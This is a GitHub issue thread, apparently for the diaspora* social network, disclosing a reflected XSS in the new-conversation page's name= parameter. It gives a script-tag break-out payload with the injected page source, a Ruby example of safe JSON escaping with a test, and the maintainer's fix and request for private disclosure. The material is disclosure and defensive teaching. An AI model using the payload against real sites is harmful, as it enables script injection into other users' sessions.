Reflected XSS Vulnerability #4010

Closed
BitBitmap opened this Issue Feb 26, 2013 · 1 comment

2 participants

@BitBitmap

There's a reflected XSS in the window where you send a message to another user.

The URL path is /conversations/new?contact_id=XXX&name= where XXX is a valid contact_id. You can add

</script><script>alert(1);</script>

to name= to execute a reflected XSS attack.

The source would look like this after the XSS:

<script>
  $(document).ready(function () {
    var data = $.parseJSON( "[{\"value\":1719514,\"name\":\"test test\"}]" ),
        autocompleteInput = $("#contact_autocomplete");

    autocompleteInput.autoSuggest(data, {
      selectedItemProp: "name",
      searchObjProps: "name",
      asHtmlID: "contact_ids",
      retrieveLimit: 10,
      minChars: 1,
      keyDelay: 0,
      startText: '',
      emptyText: 'No Results Found',
      preFill: [{name : "</script><script>alert(1)</script>",
                 value : "1719514"}]
      });
    autocompleteInput.focus();
  });
</script>

If needed, I can replicate this attack for you. This reflected XSS does not work in a few browsers like IE and Google Chrome because of XSS filtering.
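The root cause described above is server-rendered JSON being interpolated into an inline `<script>` block without escaping the characters the HTML parser cares about: the browser's HTML parser runs before the JavaScript parser, so a literal `</script>` inside a JSON string value closes the element regardless of the JS string quoting. The following plain-Ruby example is added here to illustrate that mechanism and one standard mitigation (escaping `<`, `>` and `&` as `\uXXXX` sequences inside the JSON, the same idea Rails' `json_escape` helper implements); it is not diaspora*'s code and not the fix in cf9659d, and the `contact_id`/name values are constructed from the report.

```ruby
require 'json'

# Constructed sample values taken from the report: the contact id and the
# break-out string supplied via the name= parameter, plus a benign name.
CONTACT_ID  = 1719514
ATTACK_NAME = '</script><script>alert(1)</script>'
BENIGN_NAME = 'test test'

# Unsafe rendering: JSON.generate leaves "<", ">" and "&" untouched, so a
# "</script>" inside a string value terminates the surrounding <script>
# element when the HTML parser sees it.
def unsafe_script_tag(contact_id, name)
  json = JSON.generate([{ value: contact_id, name: name }])
  "<script>var data = #{json};</script>"
end

# Characters that are significant to the HTML parser (and the two line
# terminators that are legal in JSON but not in pre-ES2019 JS string literals),
# mapped to JSON \u escapes that decode to the same characters.
HTML_SIGNIFICANT = {
  '<'      => '\u003c',
  '>'      => '\u003e',
  '&'      => '\u0026',
  "\u2028" => '\u2028',
  "\u2029" => '\u2029'
}.freeze

# Safe rendering: the output is still valid JSON and valid JavaScript, and it
# decodes to the original string, but the HTML parser never sees "</script>".
def json_for_script(obj)
  JSON.generate(obj).gsub(/[<>&\u2028\u2029]/) { |c| HTML_SIGNIFICANT[c] }
end

def safe_script_tag(contact_id, name)
  json = json_for_script([{ value: contact_id, name: name }])
  "<script>var data = #{json};</script>"
end

# Simple check usable in a response-body test or template audit: a correctly
# rendered page contains exactly one "</script" for this block (the real
# closing tag). A higher count means user data broke out of the script context.
def script_closers(html)
  html.scan(%r{</script}i).length
end

# Round trip: escaping must not alter the data the client receives.
def round_trip_name(name)
  JSON.parse(json_for_script([{ value: CONTACT_ID, name: name }])).first['name']
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe closers: #{script_closers(unsafe_script_tag(CONTACT_ID, ATTACK_NAME))}"
  puts "safe closers:   #{script_closers(safe_script_tag(CONTACT_ID, ATTACK_NAME))}"
  puts "round trip ok:  #{round_trip_name(ATTACK_NAME) == ATTACK_NAME}"
end
```

Escaping inside the JSON is preferable to HTML-escaping the whole value (`&lt;` would reach the JavaScript side as literal `&lt;`), and it is independent of any browser-side XSS filter, which the report notes is what happened to block the payload in IE and Chrome.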

@jhass jhass closed this in cf9659d Feb 26, 2013
@jhass
diaspora* social network member

Thank you for notifying us of this.

However, for the next time we would very much welcome a more responsible disclosure via any means of non-public communication.
